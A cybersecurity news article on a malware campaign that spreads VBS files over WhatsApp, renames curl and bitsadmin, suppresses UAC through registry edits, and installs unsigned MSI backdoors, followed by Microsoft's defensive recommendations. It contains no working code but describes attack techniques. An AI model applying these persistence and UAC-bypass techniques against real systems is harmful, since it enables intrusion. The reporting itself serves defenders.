Rising Threat of Malware Campaigns Utilizing WhatsApp for VBS Distribution
A recently identified malware campaign is making waves in the cybersecurity community due to its unique approach of exploiting WhatsApp messages to deliver malicious Visual Basic Script (VBS) files. This alarming tactic targets Windows users and enables persistent remote access through the deployment of unsigned MSI installers.
The malware campaign initiates by sending WhatsApp messages containing seemingly innocuous VBS file attachments. However, these files, when opened on a Windows machine, execute scripts that pave the way for further malicious activity. Initially, the generated script creates hidden folders in the C:\ProgramData directory. Subsequently, it copies essential Windows utilities, such as curl.exe and bitsadmin.exe, into these newly created locations, cleverly renaming them to misleading file names like netapi.dll and sc.exe.
Despite the manipulation of filenames, the binaries retain their original Portable Executable (PE) metadata, including the OriginalFileName field, showing that they are still curl.exe and bitsadmin.exe. This discrepancy between the on-disk filename and embedded metadata offers a potential detection mechanism for security products that scrutinize PE headers.
According to experts from Microsoft Defender, this campaign reportedly began in late February 2026. Attackers aim to establish a foothold in the victim’s system, facilitate privilege escalation, and ultimately install malicious MSI packages that allow for deeper infiltration.
In environments lacking comprehensive inspection capabilities, defenders must monitor command-line arguments and network telemetry related to these utilities to detect potential abuse. The manipulation of trusted cloud infrastructure, such as AWS S3, Tencent Cloud, and Backblaze B2, is a notable tactic used by the attackers to facilitate their activities. By routing malicious downloads through these reputable platforms, the operators effectively camouflage their traffic as routine enterprise operations, complicating efforts to block the malicious activity based solely on domain or IP reputation.
This strategy reflects an unsettling trend where cybercriminals weaponize legitimate cloud services to host dropper files and command-and-control resources, banking on the notion that businesses are hesitant to aggressively filter traffic from essential platforms. As organizations increasingly depend on "living-off-the-land binaries" (LOLBins), the behavioral profile of such attacks remains notably low, especially within environments that primarily focus on identifying unknown binaries or well-known malware families.
Once the attackers establish a foothold in the victim’s system, they deploy secondary VBS payloads, such as auxs.vbs, 2009.vbs, and WinUpdate_KB5034231.vbs, aimed at further destabilizing the system. These payloads begin to manipulate critical Windows settings, including User Account Control (UAC) and various registry settings, to ensure elevated privileges and better chances of maintaining access.
Through repeated attempts to launch cmd.exe with administrative rights, the attackers modify registry keys located under HKLM\Software\Microsoft\Win. By altering entries such as ConsentPromptBehaviorAdmin, they suppress UAC prompts, which, in turn, enables silent elevation of privileges. The combination of these registry manipulations with sophisticated UAC bypass techniques keeps the attackers firmly entrenched, allowing them to resist conventional cleanup efforts even after system reboots.
The final phase of this malware campaign sees the deployment of unsigned MSI installers that mimic common enterprise software such as Setup.msi, WinRAR.msi, LinkPoint.msi, and AnyDesk.msi. The lack of trusted publisher signatures on these installers is a strong indicator of malicious intent, given that legitimate software usually carries these signatures. Once these backdoors are installed, they provide attackers with persistent, interactive control over compromised hosts.
The widespread use of MSI-based deployment in managed environments allows these backdoors to easily blend into standard software rollout activities, especially if vigilant code-signing and reputation checks are not enforced.
In response to this surge in attacks, Microsoft has recommended various strategies for organizations to fortify their defenses. These recommendations include restricting or blocking script hosts such as wscript, cscript, and mshta in untrusted locations, as well as monitoring for renamed or concealed Windows utilities executed with atypical parameters.
Moreover, enabling cloud-delivered protection, implementing Endpoint Detection and Response (EDR) in block mode, and applying attack surface reduction rules for obfuscated or script-launched executables are essential measures that organizations can take to mitigate the risks posed by similar living-off-the-land campaigns.
Finally, organizations are strongly encouraged to enhance their inspection of traffic to cloud services like Tencent Cloud and Backblaze B2, focusing on identifying suspicious download patterns rather than relying solely on the reputation of destinations. To further combat these threats, it is vital for defenders to track registry changes under HKLM\Software\Microsoft\Win and be vigilant for signs of frequent UAC tampering, which can serve as potential indicators of compromise.
As malware tactics continue to evolve and become increasingly sophisticated, the collective response of organizations, security professionals, and software providers will be crucial in safeguarding against such threats.